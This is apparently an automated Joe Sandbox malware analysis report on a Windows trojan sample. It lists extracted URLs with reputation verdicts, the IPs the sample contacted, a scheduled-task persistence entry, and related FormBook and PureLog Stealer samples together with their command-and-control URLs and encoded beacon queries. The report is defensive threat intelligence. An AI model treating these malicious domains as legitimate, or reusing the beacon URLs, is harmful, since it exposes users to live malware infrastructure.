http://schemas.micro	explorer.exe, 0000000A.00000002.4482361431.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.2071717065.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.2070443349.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.merrycleanteam.com	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.dnwgt80508yoec8pzq.top/v15n/www.kapalwin.live	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.mpo525.monster/v15n/	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.go4stores.com/v15n/www.hatesa.xyz	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kurainu.xyz	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.dnwgt80508yoec8pzq.top	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mirotcg.infoReferer:	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.dyahwoahjuk.store/v15n/	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.mpo525.monsterReferer:	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	explorer.exe, 0000000A.00000000.2078451018.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4486803346.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3101417331.000000000C512000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811463155.000000000C512000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	CZyOWoN2hiszA6d.exe, 00000000.00000002.2046045143.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, dacYzRiJuWECy.exe, 0000000B.00000002.2104588083.00000000026AF000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.vicmvm649n.top	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nijssenadventures.com	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.go4stores.com	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.visualvarta.com/v15n/	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wns.windows.com/)s	explorer.exe, 0000000A.00000000.2074669355.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4483326842.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.turbo3club.siteReferer:	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.dyahwoahjuk.storeReferer:	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.dnwgt80508yoec8pzq.topReferer:	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kapalwin.liveReferer:	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.visualvarta.comReferer:	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mpo525.monster/v15n/www.vicmvm649n.top	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.agenkilat-official.spaceReferer:	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.turbo3club.site/v15n/	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.vicmvm649n.topReferer:	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.turbo3club.site	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.visualvarta.com/v15n/www.nijssenadventures.com	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.merrycleanteam.com/v15n/	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nijssenadventures.com/v15n/www.dnwgt80508yoec8pzq.top	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mirotcg.info/v15n/www.dyahwoahjuk.store	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.vicmvm649n.top/v15n/	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	CZyOWoN2hiszA6d.exe, dacYzRiJuWECy.exe.0.dr	false	URL Reputation: safe	unknown
http://www.mirotcg.info/v15n/	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://outlook.com	explorer.exe, 0000000A.00000003.3097577275.0000000009C92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4484488768.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094644679.0000000009BAC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2074669355.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.mirotcg.info	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kurainu.xyz/v15n/www.culturamosaica.com	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.cloudflare.com/5xx-error-landing	explorer.exe, 0000000A.00000002.4490198353.000000001191F000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 0000000D.00000002.4475737181.000000000559F000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.gtur.top	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.culturamosaica.com/v15n/	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.dyahwoahjuk.store/v15n/www.mpo525.monster	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.vicmvm649n.top/v15n/www.go4stores.com	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.agenkilat-official.space	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.hatesa.xyz/v15n/	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.merrycleanteam.comReferer:	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.hatesa.xyz	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOS	explorer.exe, 0000000A.00000000.2065592098.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3100045279.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.kapalwin.live/v15n/www.merrycleanteam.com	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.hatesa.xyz/v15n/www.turbo3club.site	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.gtur.top/v15n/	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.go4stores.com/v15n/	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.dnwgt80508yoec8pzq.top/v15n/	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://api.msn.com/	explorer.exe, 0000000A.00000000.2074669355.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4483326842.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.v	explorer.exe, 0000000A.00000002.4473768693.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2048449810.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.kurainu.xyz/v15n/	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
158.69.95.141	www.mpo525.monster	Canada	16276	OVHFR	false
23.227.38.74	shops.myshopify.com	Canada	13335	CLOUDFLARENETUS	false
103.235.47.188	www.wshifen.com	Hong Kong	55967	BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtd	false
3.33.130.190	mirotcg.info	United States	8987	AMAZONEXPANSIONGB	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1487821
Start date and time:	2024-08-05 08:49:10 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	CZyOWoN2hiszA6d.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@1050/15@13/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 88 Number of non-executed functions: 326
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
02:49:58	API Interceptor	1x Sleep call for process: CZyOWoN2hiszA6d.exe modified
02:50:01	API Interceptor	37x Sleep call for process: powershell.exe modified
02:50:04	API Interceptor	1x Sleep call for process: dacYzRiJuWECy.exe modified
02:50:09	API Interceptor	7930412x Sleep call for process: explorer.exe modified
02:50:45	API Interceptor	7418492x Sleep call for process: cmstp.exe modified
08:50:01	Task Scheduler	Run new task: dacYzRiJuWECy path: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
23.227.38.74	bSecDbrnMO4yqnP.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.kaidifeiniroo.net/ps15/?Bh=BR5e+vAYPKSU8wYOTLy7wpzRN5ByJvme3fpAhHNJMoSEpLzyyPH2rOLUFKYCtqROMrfi&DxoLiH=dbYdUphHwt44W
	MCS61094Y5OI8.exe	Get hash	malicious	FormBook	Browse	www.jihanshop.com/de94/
	JTM300724IU.vbe	Get hash	malicious	FormBook	Browse	www.herbatyorganics.com/de94/?jHi=G6458LirWIUZKPaSDbNjmBsF6Jj2Hj01hgC1zdopZszCrt3bVxyWbRXqPM8+oK1eghC9&xZ-=MZcxq
	LisectAVT_2403002B_448.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.oliviasnowceramics.com/hfhf/?OX0x=jL0dir&6lBX5p6=H/1t5Iv1mS6qazNvC4GaDsDTbokcX84DH7AxnoN69apBAJZ/+anivlDzVEyCaSCvjfTA
	xU0wdBC6XWRZ6UY.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.kaidifeiniroo.net/ps15/?XtutFHLx=BR5e+vAYPKSU8wYOTLy7wpzRN5ByJvme3fpAhHNJMoSEpLzyyPH2rOLUFKU7hL9ObtDz64d8cw==&_jATs=UfdXThPpQ4ST0
	FSW510972H6P0.exe	Get hash	malicious	FormBook, DBatLoader	Browse	www.sewassist.com/de94/
	gUJak0onLk.elf	Get hash	malicious	Unknown	Browse	shop.bikehireoldghostroad.com/
	S04307164.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.wergol.com/hy08/?kBZhq=76ARE7XQpOejeJ4AXgyv9+sF91x02cjLA3TRMrZhHEY9TEByi8vF89DJ/f4r0wEyMxd7&1bY=GtxhAHB
